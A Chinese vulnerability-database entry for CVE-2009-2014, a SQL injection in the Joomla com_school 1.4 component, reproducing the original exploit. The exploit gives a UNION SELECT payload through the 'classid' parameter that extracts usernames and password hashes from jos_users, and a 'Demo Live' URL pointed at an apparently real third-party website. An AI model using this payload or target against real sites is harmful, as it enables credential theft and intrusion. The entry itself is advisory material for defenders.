Joomla! 组件"ComSchool"参数'classid' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117924 漏洞类型 SQL注入
发布时间 2009-06-08 更新时间 2009-06-09
CVE编号 CVE-2009-2014 CNNVD-ID CNNVD-200906-125
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8891
https://cxsecurity.com/issue/WLB-2009060135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-125
|漏洞详情
Joomla!ComSchool(com_school)component1.4版本中存在SQL注入漏洞。远程攻击者可以借助对index.php的一个showclass操作中的classid参数,执行任意SQL指令。
|漏洞EXP
----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

 <Sql Code>:
 -null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
 

Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>damj3t@gmail.com</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>

# milw0rm.com [2009-06-08]
|参考资料

来源:XF
名称:joomla-comschool-classid-sql-injection(50988)
链接:http://xforce.iss.net/xforce/xfdb/50988
来源:BID
名称:35257
链接:http://www.securityfocus.com/bid/35257
来源:MILW0RM
名称:8891
链接:http://www.milw0rm.com/exploits/8891